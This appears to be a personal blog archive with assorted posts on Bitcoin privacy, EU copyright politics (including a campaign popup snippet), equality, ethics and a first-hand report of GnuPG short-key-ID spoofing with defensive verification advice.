The prince marries the princess, the king exercises his right of the first night and all live happily ever after.

Epilogue

I hope I could show that Bitcoin isn’t the haven for freedom and state-free happiness it is often touted to be. It can reduce the power of banks due to the required trust in their actions - and I think that it will be used by banks themselves as a very efficient backend for reliable transactions - but the total accountability inherent in Bitcoin is hostile to any kind of free expression and independent life, because it allows others to judge you by your actions years later and as such creates pressure to self-censor how you use Bitcoin. In this it is inferior to cash.

And as I showed here, on the longterm only large criminal organizations will be able to retain anonymous usage of Bitcoin, while all others will either be driven into buying the services of these organizations to stay anonymous (which makes them susceptible to blackmail: their Bitcoins could lose most of their value at any point) or into registering their Bitcoin identity and giving up on anonymous usage of Bitcoin.

AnhangGröße
2015-01-28-Do-destroy-anonymous-bitcoin.pdf68.65 KB
2015-01-28-Do-destroy-anonymous-bitcoin.org3.69 KB

7,26€ through Flattr last month

Last month I earned 7,26€ through my Flattr account (Flattr is a voluntary payment service where people can make micropayments if they like something - after enjoying it). The flattrs came in through just 4 items:

Thank you very much for your flattrs, dear supporters1! Thanks to you I could pay most of my server cost this month via the money from flattr - and that’s great!2


  1. This month I was flattred by eileentso, esocom, Elleo and a user who wanted to stay anonymous. Thank you again! 

  2. And being able to pay the server might become much more important in the following months, as soon as my wife’s parental money runs out and I need to finance the family from a (50%) PhD-salary for a year… 

A simple solution to the dining philosophers problem

The problem

5 Philosophers do nothing but eat and think.

They have a table with 5 chairs, 5 plates and 5 forks.

Each of them eats with two forks.

Ensure that none of them starves.

The solution

First I teach them to always take the left fork first.

Then I smash one of their chairs.

Explanation

Since they can't repair the chair (they think, but they don't build), there are only 4 places left, and so they have one leftover fork which gets passed on, once one finished eating.

Inspired by Willim Stallings' Operating systems: "Use a servant who lets only 4 dine at the same time"

Naturally now they have to either change places or move chairs, so they might still need a servant :)

Bitte stimmen Sie für Anpassungen der EU-Urheberrechtsrichtlinie

Ein offener Brief an die EU-Abgeordneten zur Abstimmung über die EU-Urheberrechtsrichtlinie.

Sehr geehrte Abgeordnete des Europäischen Parlaments,

Am 12. September haben Sie die Möglichkeit, darüber abzustimmen, ob das Internet weiter kleinen Firmen und Kreativen offensteht, was die Urheberrechtsrichtlinie in der Fassung von 2016 bewirkt hätte, oder ob es zu einer monopolistischen Zensurmaschine wird, wie es die Fassung vom Mai 2018 bewirken würde.

Ich schreibe Ihnen als Programmierer, weil die Auswirkungen dieser Richtline rein rechtlich nicht zu überblicken sind; das gilt vor allem für Artikel 13. So wenig wie ein Gesetz die Flut stoppen kann, kann es einen Algorithmus schaffen, der alle Urheberrechtsverletzungen schon beim Upload stoppt, aber alle legalen Inhalte erlaubt. Wenn wirklich alle Urheberrechtsverletzungen gestoppt werden müssen, dann müssen gleichzeitig viele legale Äußerungen verhindert werden, und zwar laut der Richtlinie in jeglicher öffentlicher Kommunikation. Das ist allerdings, was die Richtlinie fordert, da sie die Beweislast umkehrt, indem sie von Anbieter von Kommunikationsplattformen verlangt, den Rechteinhabern nachzuweisen, dass sie genug tun (und damit grundlegende rechtsstaatliche Prinzipien verletzt, nach denen im Zweifel die Unschuldsvermutung gilt). Plattformen — große wie kleine — müssen daher erstmal alles stoppen. Da auch keine Strafen für fälschliche Block-Forderungen vorgesehen sind, wird es sehr einfach, unerwünschte Aussagen zu verhindern, und sei es nur zeitweise.

Ein Youtube-Nachrichten-Autor (LeFloid) hat dazu letztens in einem Interview mit dem NDR berichtet,[1] dass bereits die existierenden Filter in youtube immer wieder Videos von ihm für ein paar Tage blockieren, was bedeutet, dass das Video weniger als ein Zehntel der Zuschauer bekommt, die es sonst haben würde, weil das Thema schon vorbei ist. Er geht so damit um, dass er seine Videos auch auf anderen Plattformen anbietet. Doch mit der Formulierung von Artikel 13 in der Fassung von Mai 2018 müssten alle Plattformen Uploads filtern, und aus Haftbarkeitsgründen müssten sie die Filter großer Anbieter nutzen, die es sich leisten können, zig Millionen in die Entwicklung von Filtertechnik zu investieren (und wie die Erfahrung von LeFloid zeigt trotzdem in vielen Fällen erlaubte Inhalte blocken). Damit könnte er diese Videos nirgendwo mehr zeitnah anbieten.

Ähnlich problematisch sind Artikel 12, Artikel 11 und Artikel 3, doch ich kann Ihnen dazu keine Beispiele schreiben, weil ich morgen um 5:00 aufstehen und zur Arbeit muss.

Daher möchte ich Sie stattdessen bitten, sich die Vorschläge von Greens/EFA und EFDD unvoreingenommen durchzulesen und ihrem Gewissen zu folgen, mit dem Wissen, dass das die Vorschläge sind, die von Leuten mit Fachkenntnis in Programmierung unterstützt werden.

Mit freundliche Grüßen,

Dr. Arne Babenhauserheide

[1] https://www.youtube.com/watch?v=KE5AZDBygNQ

Censorship in the Streets — it’s idiocy everywhere

A man in the streets faces a knife.
Two policemen are there it once. They raise a sign:

“Illegal Scene! Noone may watch this!”

The man gets robbed and stabbed and bleeds to death.
The police had to hold the sign.

Welcome to Europe, citizen. Censorship is beautiful.

→ Courtesy to Censilia, who wants censorship in the EU after it failed in Germany. You might also be interested in 11 more reasons why censorship is useless and harmful.

PS: This poem is free and permissively licensed: Please feel free to use it anyway you like, as long as you provide a backlink.

Copyright directive modal window for your website

The European Copyright directive threatens online communication in Europe. On September 12th the European parliament takes the crucial vote which can still fix it. But the parliamentarians (MEPs) need to hear our voices.

If you care about the future of the Internet in the EU, please Call your MEPs!

And if you have a website and want to inform your visitors about this vote, copy the following and add it to your site:


    <!-- begin fsf-dbd-elem campaign element -->
    <!-- this campaign element was repurposed for the fight to fix the European Copyright directive, using freedom 1 of the four freedoms granted by the GPLv3 -->
            <link type="text/css" rel="stylesheet" href="https://static.fsf.org/nosvn/fonts/fa/css/font-awesome.min.css">
            <style>
#fsf-dbd-elem-container div {
    -webkit-box-sizing: border-box;
       -moz-box-sizing: border-box;
            box-sizing: border-box;
}

@media screen and (min-width: 700px) {

    #fsf-dbd-elem-outer-v-center {
        display: table;
        position: absolute;
        height: 100%;
        width: 100%;
    }
    #fsf-dbd-elem-inner-v-center {
        display: table-cell;
        vertical-align: middle;
    }

    #fsf-dbd-elem {
        width: 687px;
        margin-left: auto;
        margin-right: auto;
    }

    #fsf-dbd-elem-right-column {
        float: right;
        width: 280px;
        padding-left: 20px;
    }

    #fsf-dbd-elem-left-column {
        width: 100%;
        float: left;
        margin-right: -280px;
    }

    #fsf-dbd-elem-text {
        margin-right: 280px;
    }
}

@media screen and (max-width: 699px) {

    #fsf-dbd-elem {

        -ms-box-orient: horizontal;
        display: -webkit-box;
        display: -moz-box;
        display: -ms-flexbox;
        display: -moz-flex;
        display: -webkit-flex;
        display: flex;

        -webkit-flex-flow: row wrap;
        flex-flow: row wrap;
    }

    #fsf-dbd-elem {
        width: 80vw;
        margin-left: 10vw;
        margin-right: 10vw;
        margin-top: 40px;
        margin-bottom: 40px;
    }

    #fsf-dbd-elem-right-column {
        width: 100%;
        order: 1;
    }

    #fsf-dbd-elem-left-column {
        width: 100%;
        order: 2;
    }

    #fsf-dbd-elem-text {
        margin-top: 20px;
    }
}

@media screen and (max-width: 360px) {
    .long-button-text {
        font-size: 25px !important;
    }
}

#fsf-dbd-elem-container {
    position: fixed;
    z-index: 10000;
    left: 0;
    top: 0;
    width: 100%;
    height: 100%;
    overflow: auto;
    background-color: rgba(0,0,0,0.8);

    font-weight: normal;
}

#fsf-dbd-elem a, a:active, a:focus {
    outline: none;
}

#fsf-dbd-elem {
    overflow: auto;
    zoom: 1;
    padding: 20px;
    border-style: solid;
    border-width: 5px;
    border-color: rgb(254, 203, 0);
    border-radius: 20px;
    box-shadow: 0px 0px 10px #111111;
    background: #ffffff url("https://www.defectivebydesign.org/sites/all/themes/dbd2/images/repeat-offenders-bg.png") top left repeat;
}

#fsf-dbd-elem-header {
    width: 100%;
}

#fsf-dbd-elem-header h2 {
    font-family: sans-serif,"Helvetica",Arial;
    font-weight: bold;
    font-size: 24px;
    color: black;
    text-shadow: 0px 0px 8px #ffffff, 0px 0px 8px #ffffff;
    padding-bottom: 20px;
    margin-top: 0px;
    margin-bottom: 0px;
    border: none;
}

#fsf-dbd-elem-close-button {
    float: right;
    height: 40px;
    margin-right: -20px;
    margin-top: -20px;
    padding: 11px;
    color: #888;
    cursor: pointer;
}

#fsf-dbd-elem-close-button:hover {
    color: #aaf;
}

#fsf-dbd-elem-right-column {
    text-align: center;
    -webkit-user-select: none;
       -moz-user-select: none;
        -ms-user-select: none;
            user-select: none;
}

#fsf-dbd-elem-buttons div {
    height:53.333px;
    line-height: 53.333px;
    margin-left:auto;
    margin-right:auto;
    display:block;
}

#fsf-dbd-elem-buttons {
}

#fsf-dbd-elem-buttons a {
    width: 100%;
    display: block;
    text-align:center;
    font-size:35px;
    color:#000000;
    text-decoration: none;
    font-family: sans-serif,"Helvetica",Arial;
    font-weight: normal;
}

#fsf-dbd-elem-maybe-later {
    margin-top: 5px;
    margin-bottom: -5px;
}

#fsf-dbd-elem-maybe-later a {
    color: #4298b5;
    line-height: 20px;
    text-decoration: none;
    cursor: pointer;
    font-weight: normal;
    font-family: sans-serif,"Helvetica",Arial;
    font-size: 16px;
}

#fsf-dbd-elem-text {
    text-align: left;
}

#fsf-dbd-elem-text a {
    color: #e64c22;
    font-weight: 700;
    text-decoration: none;
}

#fsf-dbd-elem-text a:hover {
    color: #bc1b1b;
}

#fsf-dbd-elem-text a:focus {
    color: #bc1b1b;
}

#fsf-dbd-elem-text a:active {
    color: black;
}

#fsf-dbd-elem-text p {
    font-family: sans-serif,"Helvetica",Arial;
    font-size: 16px;
    font-weight: normal;
    margin: 0px 0px 10px 0px;
    line-height: 20px;
    color: black;
    text-shadow: 0px 0px 8px #ffffff, 0px 0px 8px #ffffff;
}

#fsf-dbd-elem-text li {
    font-family: sans-serif,"Helvetica",Arial;
    font-size: 14px;
    font-weight: normal;
    margin: 0px 0px 10px 0px;
    line-height: 20px;
    color: black;
    text-shadow: 0px 0px 8px #ffffff, 0px 0px 8px #ffffff;
}
            </style>
            <div id="fsf-dbd-elem-container" style="display: none;">
                <div id="fsf-dbd-elem-outer-v-center">
                    <div id="fsf-dbd-elem-inner-v-center">
                        <div id="fsf-dbd-elem">
                            <div id="fsf-dbd-elem-header">
                                <div id="fsf-dbd-elem-close-button" onclick="fsfDBDElemDontShowAgain();">
                                    <i class="fa fa-close"></i>
                                </div>
                                <h2>Sep. 12th decides the fate of the internet in the EU!</h2>
                            </div>
                            <div id="fsf-dbd-elem-left-column">
                                <div id="fsf-dbd-elem-text">

<p>The <a
href="https://juliareda.eu/eu-copyright-reform/">European Copyright directive</a> threatens online communication in Europe.<ul><li>Article 13 would require every site where you can share to <a href="https://twitter.com/ArneBab/status/1034823956107325440">build or buy massive censorship infrastructure</a>.</li><li>Article 12 would <a href="https://juliareda.eu/2018/09/copyright-sports-fans/">make it illegal to share a photo from a football game</a>.</li><li>Article 11 would require <a href="https://juliareda.eu/2018/09/copyright-showdown/">license fees for links</a>.</li><li>Article 3 would forbid working with information you find online.</ul></p>

<p>But thanks to <a href="https://juliareda.eu/2018/08/saveyourinternet-action-day/">massive shared action earlier this year</a>, the European parliament <a href="https://juliareda.eu/2018/09/copyright-showdown/">can still prevent the problems</a>. For each of the articles there are proposals which fix them. The parliamentarians (MEPs) just have to vote for them. And since they are under massive pressure from large media companies, that went as far as defaming those who took action as <em>fake people</em>, the MEPs <strong>need to hear your voice</strong> to know that your are real.</p>

<p>If you care about the future of the Internet in the EU, please <a href="https://saveyourinternet.eu/">Call your MEPs</a>.</p>

                                </div>
                            </div>
                            <div id="fsf-dbd-elem-right-column">
                                <div id="fsf-dbd-elem-buttons" style="border-radius: 20px;">
                                    <div id="button_0" style="background-color: rgb(230, 76, 34); border-radius: 20px; a {color: rgb(188, 27, 27) !important}; box-shadow: 0px 0px 5px rgba(0, 0, 0, 0.5); margin-bottom: 26.667px;">
                                      <a href="https://saveyourinternet.eu/"><i class="fa fa-check-circle"> </i>Call MEPs</a>
                                    </div>

                                    <div id="button_1" style="background-color: rgb(254, 203, 0); border-radius: 20px; box-shadow: 0px 0px 5px rgba(0, 0, 0, 0.5);">
                                      <a class="long-button-text" href="https://juliareda.eu/2018/09/copyright-showdown/"><i class="fa fa-globe"></i> Learn More</a>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
                <script type="text/javascript">
// @license magnet:?xt=urn:btih:1f739d935676111cfff4b4693e3816e664797050&dn=gpl-3.0.txt GPL-v3-or-Later

var startTime, endTime, fsfDBDElemMaybeShow, daysInFuture, fsfDBDElemHide, fsfDBDElemDontShowForDays;

startTime = new Date('2018-08-28T00:00:00Z');
switchTextTime = new Date('2018-09-11T00:00:00Z');
endTime = new Date('2018-09-13T00:00:00Z');

// possibly switch the text that is displayed in the modal window, depending
// upon the current date.
function fsfDBDElemMaybeSwitchText () {

    var now;

    now = new Date();
    if (now.getTime() < switchTextTime.getTime()) {
        return; // don't switch the dbd text
    }

    // switch dbd text
    document.getElementById("fsf-dbd-elem-text").innerHTML =' \
                                    <p> \
\
Tomorrow the European parliament decides the fate of the Internet in the EU! \
\
                                    <\/p>\
                                    <p> \
\
<a href="https://saveyourinternet.eu/">Call your MEPs today</a>! \
\
                                    <\/p>';

    // remove button_0
    button_0 = document.getElementById("button_0");
    button_0.parentNode.removeChild(button_0);

    // change href in button_1
    document.getElementById("button_1").children[0].href = "https://juliareda.eu/2018/09/copyright-showdown/"
}

// show fsf-dbd-elem if it hasn't been previously closed by
// the user, nor recently hit "maybe later",
// and the campaign is still happening
function fsfDBDElemMaybeShow () {

    var pattern, noShowDBD2018IDADElementP, now;

    now = new Date();
    if (now.getTime() < startTime.getTime() || now.getTime() > endTime.getTime()) {
        return; // don't show the fsf-dbd-elem
    }

    // see if cookie says not to show element
    pattern = /showDBD2018IDADElementP\s*=\s*false/;
    noShowDBD2018IDADElementP = pattern.test(document.cookie);

    if (!noShowDBD2018IDADElementP) {
        setTimeout(function () {
            // display the element
            document.getElementById("fsf-dbd-elem-container").style.display="block";
        }, 0);
    }
}

// call this first to set the proper text
fsfDBDElemMaybeSwitchText();
// call this right away to avoid flicker
fsfDBDElemMaybeShow();


// get the time `plusDays` in the future.
// can be a fraction.
function daysInFuture (plusDays) {
    var now, future;

    now = new Date();
    future = new Date(now.getTime() + Math.floor(1000 * 60 * 60 * 24 * plusDays));
    return future.toGMTString();
}

// hide the fsf-dbd-elem
function fsfDBDElemHide () {
    document.getElementById("fsf-dbd-elem-container").style.display="none";
}
// optionally hide elem and set a cookie to keep the fsf-dbd-elem hidden for the next `forDays`.
function fsfDBDElemDontShowForDays (forDays, hideNow) {
    if (hideNow === true) {
        fsfDBDElemHide();
    }
    //document.cookie = "showDBD2018IDADElementP=false; path=/; domain=.fsf.org; expires=" + daysInFuture(forDays);
    document.cookie = "showDBD2018IDADElementP=false; path=/; expires=" + daysInFuture(forDays);
}

// hide the element from now to past the date of the campaign
function fsfDBDElemDontShowAgain () {
    fsfDBDElemDontShowForDays(120, true);
}
// don't show the element for a while
function fsfDBDElemMaybeLater () {
    fsfDBDElemDontShowForDays(1, true);
}
// keep the element visible for now, but don't show it on future page loads
function fsfDBDElemFollowedLink () {
    fsfDBDElemDontShowForDays(120, false);
}

// close popup if user clicks trasparent part
document.getElementById("fsf-dbd-elem-container").addEventListener("click", function(event){
    fsfDBDElemDontShowAgain();
});
// don't close popup if clicking non-trasparent part (with the text and buttons)
document.getElementById("fsf-dbd-elem").addEventListener("click", function(event){
    event.stopPropagation();
});

// @license-end
                </script>
            </div>
            <!-- end fsf-dbd-elem campaign element -->

copyright directive modal window preview

(this code is based on the day against DRM modal window by the FSF, licensed under GPLv3+)

AnhangGröße
2018-09-08-copyright-directive-banner-draketo.png175.21 KB

Equality and Prosperity go hand in hand

A reply to the common argument for inequality:

Much better to focus on growing the economy than on increasing equality.

This is the old trickle down theory. Homeless people in the US could tell you that growing the economy without increasing equality does not help the poor. The reality is:

Increasing equality increases longterm growth of the economy.

The trickle-down theory goes against research results. Even the IMF has accepted that equality and prosperity aren’t opposites but rather go hand in hand: The higher the equality, the more sustained growth a country experiences (PDF).

"Against this background, the question is whether a systematic look at the data supports the notion that societies with more equal income distributions have more durable growth."

"a 10 percentile decrease in inequality (represented by a change in the Gini coefficient from 40 to 37) increases the expected length of a growth spell by 50 percent."

They show that the income distribution is the largest single governing factor for the length of a growth period.

Also the Soviet Union had a higher Gini coefficient than the US.

The Gini coefficient measures inequality: The higher it is, the higher the inequality. So the Soviet Union had higher inequality than the US at the time.

That’s a nice way to counter the cry of the ghost of evil communists which is brought up most times someone talks about increasing equality. The Soviet Union had less equality than the US at that time; consequently its growth was weaker.

We do not threaten our prosperity with higher equality. The opposite is true. And we also don’t follow the path of the Soviet Union. The opposite is true.

If all else is equal, higher equality and higher prosperity go hand in hand. Higher equality helped the west to win the economic competition against the Soviet Union.

Therefore the reality is:

To focus on growing the economy we must increase equality.

How to make companies act ethically

→ comment on Slashdot concerning Unexpected methods to promote freedom?

Was it really Apple who ended DRM? Would they have done so without the protests and evangelizing against DRM? Without protesters in front of Apple Stores? And without the many people telling their friends to just not accept DRM?

That “preaching” created a situation where Apple could reap monetary gain from doing the right thing. You see how they act when the stakes are different.

What you can do to make companies act ethically is to create a situation where they can make more money by working ethically than by ripping you off. The ways to do that are

  1. (1) Laws (breaking them costs money when you get caught),
  2. (2) Taxes on doing the wrong thing (i.e. pollution),
  3. (3) Offering your work in ways, which make it easier for people to make money ethically than unethically (that’s what copyleft licensing does),
  4. (4) Trying to convince people to do 3,
  5. (5) Trying to convince people to shun products which are created unethically (that’s what you call preaching),
  6. (6) Only paying for products which were produced ethically.

RMS does 3,4, 5 and 6, so he’s pretty much into gaming the market - and “preaching” is only one of the tools in his box. Though what he does is more convincing than preaching: He gives us reasons why unfree software is bad - and the mental tools to resist the preaching from the other side (for example via analyses of speech-tricks, like calling state-granted monopolies “property”).

Never trust a company

Answer to a thread in the Gnutella-Forums where people bashed LimeWire for putting money first.

They are a company, and you don't trust companies. Not because they are evil, but because they have to think of money first and foremost.

If they do not put money first, they go down and others come up who do - and their employees will lose their job. At least as long as people still buy products without regard for ethics.

I hold them in very high esteem for GPL-ling LimeWire and for standing up against the lawsuit.

They are a company, and that makes them non-trustworthy, but because they are a company, they can fight a battle which none of us others could fight.

Never trust a company, but don't judge them down for thinking money before morals or ethics from time to time, as long as they don't do it all the time. You only know they are going down a dark road, if they even do harm where it is against economical sanity.

And never ever deal with... - a Shadowrun saying :)

PS: Also keep in mind that a company in the stock market might actually be forced to do unethical but profitable things, because the CEO is liable to the stakeholders and could personally face legal action when refusing them. If it is not in the stock market, the company has a responsibility to the employees. Which is why you as customer can never trust it even if the owners are all well-meaning folks — though they might act in your interest most of the time, so expecting betrayal all the time would also be wrong. They would have to be very strong in ideology to put your well-being over the well-being of their employees (judge for yourself whether they would then actually be good).

I agree with just one of the 10 commandments of judaism and christianity

Many christians and many people who talk about “western christian values” like to say that the 10 commandments are universal: everyone can agree with them. So I checked that. I take them by their name: are they suitable as commandments? Not as a fuzzy general guideline, but as binding rules and a foundation for a shared culture?

(1.0) I am god who lead you from slavery in egypt → uhm, no?

(1.1) You shall not have other gods → uhm, why? I have pagan friends, so: no.

(1.2) You shall not represent me as anything which exists → that might make sense: don’t divide by different representations. But it did not work out, as now people picture angels, saints, and so on (and god, too). Also it’s part of commandment 1, so overally no to commandment 1.

(2) You shall not misuse my name → oh god, that really worked, right? no.

(3) No one close to you may work on sunday → and he went to the hospital and… no.

(4) Honor your parents → who might have abused you. No.

(5) Don’t murder → murder is defined nowadays as killing for low motives. So yes (with the right definition of low motives).

(6) Don’t break your marriage → if your wife/husband agrees, why not? So no.

(7) Don’t steal → if you would starve otherwise or the other one created monopolies for himself to oppress you: why not? So no.

(8) Don’t bear false witness → sounds mostly ok. Except if you want to save someone from a mob. So even this is not fit for a general rule. We even have laws which allow bearing false witness when asked illegal questions in a job interview. So no.

(9) Don’t desire the wife of another → why not? What if she desires you, too, and he does not mind? So no.

(10) Don’t desire property of others → be a nice little slave. Desire does not hurt anyone, and it can be a big motivation. So no.

Of the 10 commandments there is only one I agree with: Don’t murder (do not kill out of low motives). All the rest are either petty restrictions which aren’t needed in a free society or would be harmful if people actually always followed them closely.

Note that even for the one commandment I agree with, I only agree with the original version, not with what is currently taught (do not kill).

So the ten commandments are ill suited as a “foundation of western values”. The actual foundation of western values seems to take inspiration from them, but follows from much deeper values like preserving human dignity, valuing every human1, being reliable, and only limiting individual freedom where the freedom of others begins.


  1. Christian storytelling gave this a focus on valuing children and wanting them to enjoy their childhood, which may actually be part of the foundation for good elements of the western education systems. 

I w̶a̶s̶ t̶a̶r̶g̶e̶t̶e̶d̶ got hit by an attack on GnuPG/PGP

Update: Might not actually be targeted. See Evil 32. Thanks to Ximin Luo for giving me more peace of mind!

Update: I’m not the only one hit by this. Here’s a conversation on GNU social with more people hit - though no one else reported yet having two keys faked and cross-signed.

Update: At the very least you should do this: echo keyid-format long >> ~/.gnupg/gpg.conf

On the 29th of August a colleague asked me “which key should I use to encrypt to you?” I was confused, because I only have one key for that email address. So he showed me the keys he saw:

$ gpg2 --list-keys --fingerprint arne.babenhauserheide
-------------------------------
pub   2048R/A70DA09E 2011-10-07 [expires: 2016-10-05]
uid                  Arne Babenhauserheide <arne.babenhauserheide@kit.edu>
sub   2048R/39829E5F 2011-10-07 [expires: 2016-10-05]

pub   2048R/A70DA09E 2014-06-16 [revoked: 2016-08-16]
uid                  Arne Babenhauserheide <arne.babenhauserheide@kit.edu>

What’s happening here?

At first I thought “did I accidentally create and upload a new key?”

Then I noticed the key IDs:

pub 2048R/A70DA09E 2011-10-07 [expires: 2016-10-05]
pub 2048R/A70DA09E 2014-06-16 [revoked: 2016-08-16]

They are the same. But with different creation date, and one of them revoked. Was that a bug? Did I really revoke my key? Did someone break into my computer and steal the private key? I felt a moment of panic.

Then I remembered an article about spoofing keys by brute forcing partially equal fingerprints. Note that what you see as IDs is only a small part of the real identifier, and that what every tutorial on GnuPG tells you to to verify is not the ID, but the fingerprint: The full identifier.

After taking a deep breath, that’s what we did. The results showed clearly that what we had seen is an actual attack on my key - though one that had just ended:

pub   2048R/A70DA09E 2011-10-07 [expires: 2016-10-05]\\
      Key fingerprint = DC44 49A9 A0C9 9632 9897  1842 5C83 F364 A70D A09E
uid                  Arne Babenhauserheide <arne.babenhauserheide@kit.edu>\\
sub   2048R/39829E5F 2011-10-07 [expires: 2021-08-28]

pub   2048R/A70DA09E 2014-06-16 [revoked: 2016-08-16 ]\\
      Key fingerprint = FA7F DA53 89DC 30F0 385B  FC4A EA32 F8E6 A70D A09E
uid                  Arne Babenhauserheide <arne.babenhauserheide@kit.edu>\\
     (also: expires: 2016-10-05)

Note the matching IDs and the matching two blocks of the fingerprint (which are just what’s shown in the ID), while the rest of the fingerprint is clearly different.

In a modern gpg setup, the key should have been shown with a 16 letter ID, so we would have seen the difference, but if the creation date is correct, these keys were made 2 years ago (though this could be faked easily by simply changing the date on the computer doing the computation). And my local gpg still shows the shorter 8 letter ID, just like the one from my colleague. If you request my key with gpg --recv-key A70DA09E, you could actually get the fake key!

Is this an attack?

Let’s relax for a moment. How do I know that this isn’t just someone experimenting with fake keys for fun?

I don’t strictly know, but there are strong indicators:

  1. The fake key has the same description as my main key.
  2. The expiration date is set to the expiration date of my main key (this is easy to do, since it can be adjusted without changing the fingerprint).
  3. My key for my other email address was targeted, too:
pub   1024R/FE96C404 2014-06-16 [revoked: 2016-08-16]
      Key fingerprint = A000 B099 C138 B7EE 4C19  1D8F 895D BE4E FE96 C404
uid                  Arne Babenhauserheide (Physikliebhaber, Hobbysänger und Ideenspringquell) <arne_bab@web.de>

pub   1024D/FE96C404 2002-02-04
      Key fingerprint = 6B05 41F0 94FF 2163 6FBA  2433 3307 469B FE96 C404
uid                  Arne Babenhauserheide (Physikliebhaber, Hobbysänger und Ideenspringquell) <arne_bab@web.de>
uid                  Arne Babenhauserheide (Rollenspieler, Spinner und freiberuflicher Weltenbastler) <arne_bab@yahoo.de>
uid                  Arne Babenhauserheide (Eine selbstbewusste Gesellschaft kann viele Narren ertragen) <arne_bab@web.de>
uid                  Arne Babenhauserheide (Rollenspieler, Spinner, Physikliebhaber, Gurpser und freiberuflicher Weltenbastler) <arne_bab@web.de>
sub   1024R/0BC10548 2010-07-29
sub   1024R/95806B33 2010-07-29
sub   1024g/0136732E 2002-02-04

With this it looks like this was a targeted attack, trying to trick people into encrypting to the attackers instead of me — or in addition to me (which could easily happen when they use a GUI which selects all matching keys by default).

How can I protect myself?

This isn’t actually attacking the crypto in GnuPG but rather uses the weakest link: human oversight. To protect yourself against this, always check the full fingerprint before you use a key.

And if you download a key from someone you did not meet yet, always check the signatures on the key, before you use it for the first time. For example like this:

gpg --check-sigs "<fingerprint or email>"
gpg --check-sigs "arne.babenhauserheide@kit.edu"
pub   2048R/A70DA09E 2011-10-07 [expires: 2021-08-28]
uid                  Arne Babenhauserheide <arne.babenhauserheide@kit.edu>
sig!         FE96C404 2011-11-07  Arne Babenhauserheide (Physikliebhaber, Hobbysänger und Ideenspringquell) <arne_bab@web.de>
sig!3        A70DA09E 2016-08-29  Arne Babenhauserheide <arne.babenhauserheide@kit.edu>
sig!3        A70DA09E 2011-10-07  Arne Babenhauserheide <arne.babenhauserheide@kit.edu>
sub   2048R/39829E5F 2011-10-07 [expires: 2021-08-28]
sig!         A70DA09E 2016-08-29  Arne Babenhauserheide <arne.babenhauserheide@kit.edu>

pub   1024R/FE96C404 2014-06-16 [revoked: 2016-08-16]
rev!         FE96C404 2016-08-16  Arne Babenhauserheide (Physikliebhaber, Hobbysänger und Ideenspringquell) <arne_bab@web.de>
uid                  Arne Babenhauserheide (Physikliebhaber, Hobbysänger und Ideenspringquell) <arne_bab@web.de>
sig!3        FE96C404 2014-08-04  Arne Babenhauserheide (Physikliebhaber, Hobbysänger und Ideenspringquell) <arne_bab@web.de>
sig!         A70DA09E 2014-08-05  Arne Babenhauserheide <arne.babenhauserheide@kit.edu>

100 signatures not checked due to missing keys

You can see that my real key has signatures from people I know. The raw number of signatures also helps here, but it is easy to fake by just creating more fake keys, so do not rely on it for security. If you think “but they would not”, have a second hard look at the list above (and kudos if you spotted it right now!). The attacker actually signed the fake key for arne.babenhauserheide@kit.edu with the other fake key he or she created for arne_bab@web.de (and vice versa)!

You cannot distinguish these keys by just my keys alone!

However this is not perfect: it shows all those missing keys but not how to get them. I should file a bug for changing that.

And refer to the key by its fingerprint, so you don’t accidentally tell gpg to use the wrong key.

Summary

I was likely targeted by an attack which tried to trick people into encrypting to the wrong keys by creating new keys which looked exactly the same as my two main keys in the default key listing. These keys were revoked about a month ago, so it is likely that this attack just ended.

The attack used the keyservers as vector, combined with the UI and convenience policy of client programs. It did not break the encryption in gpg.

To protect yourself and others against being victim of attacks like this, always check the fingerprint, be vary of duplicated keys and, most importantly, sign the keys of people you know — after checking the fingerprints! And use the fingerprints for signing!

The fingerprints of my main keys:

$ gpg2 --list-keys --fingerprint arne
pub   2048R/A70DA09E 2011-10-07 [verfällt: 2021-08-28]
  Schl.-Fingerabdruck = DC44 49A9 A0C9 9632 9897  1842 5C83 F364 A70D A09E
uid       [ uneing.] Arne Babenhauserheide <arne.babenhauserheide@kit.edu>
sub   2048R/39829E5F 2011-10-07 [verfällt: 2021-08-28]

pub   1024D/FE96C404 2002-02-04
  Schl.-Fingerabdruck = 6B05 41F0 94FF 2163 6FBA  2433 3307 469B FE96 C404
uid       [ uneing.] Arne Babenhauserheide (Physikliebhaber, Hobbysänger und Ideenspringquell) <arne_bab@web.de>
uid       [ uneing.] Arne Babenhauserheide (Rollenspieler, Spinner und freiberuflicher Weltenbastler) <arne_bab@yahoo.de>
uid       [ uneing.] Arne Babenhauserheide (Eine selbstbewusste Gesellschaft kann viele Narren ertragen) <arne_bab@web.de>
uid       [ uneing.] Arne Babenhauserheide (Rollenspieler, Spinner, Physikliebhaber, Gurpser und freiberuflicher Weltenbastler) <arne_bab@web.de>
sub   1024R/0BC10548 2010-07-29
sub   1024R/95806B33 2010-07-29
sub   1024g/0136732E 2002-02-04

pub   1024D/2F6F2642 2004-10-28
  Schl.-Fingerabdruck = 7172 BE09 9661 8A67 0D70  E801 E8B2 C3EB 2F6F 2642
uid       [ vollst.] Arne Babenhauserheide (Dust: Dumb Unsuspecting STudent) <arne_bab@web.de>
sub   1024g/14FAA61F 2004-10-28

pub   4096R/FF8DA6F0 2016-03-16
  Schl.-Fingerabdruck = AFCE FDAA A09E 3014 367C  7384 7D0A B287 FF8D A6F0
uid       [ vollst.] "Arne Bab." <Arne_Bab@web.de>
sub   4096R/CE39F489 2016-03-16

pub   4096R/2403C3EB 2016-01-04
  Schl.-Fingerabdruck = F34D 6A12 35D0 4903 CD22  D5C0 13EF 8D45 2403 C3EB
uid       [ vollst.] Arne Babenhauserheide (Drak) <arne_bab@web.de>
sub   4096R/D0E0B44C 2016-01-04

pub   4096R/8A8AAA50 2016-08-29 [verfällt: 2021-08-28]
  Schl.-Fingerabdruck = B5B3 AC76 6695 D1E3 4E0B  9075 B598 1EEC 8A8A AA50
uid       [ uneing.] Arne Babenhauserheide (-) <arne.babenhauserheide@kit.edu>
sub   4096R/A017ECEC 2016-08-29 [verfällt: 2021-08-28]

For additional security you should check the copy of this article in Freenet1, where the fingerprints are protected by crypto which cannot be faked as easily as that from this site, because the keys stay on the local machine and cannot be changed by breaking into a remote machine.

Note that I extended the expiration date of my keys after I my colleague told me about the revoked keys, because my keys were short of expiring.

And if you see something like the following, you have every reason to increase your operational security:

pub   2048R/A70DA09E 2011-10-07 [expires: 2021-08-28]
      Key fingerprint = DC44 49A9 A0C9 9632 9897  1842 5C83 F364 A70D A09E
uid                  Arne Babenhauserheide <arne.babenhauserheide@kit.edu>
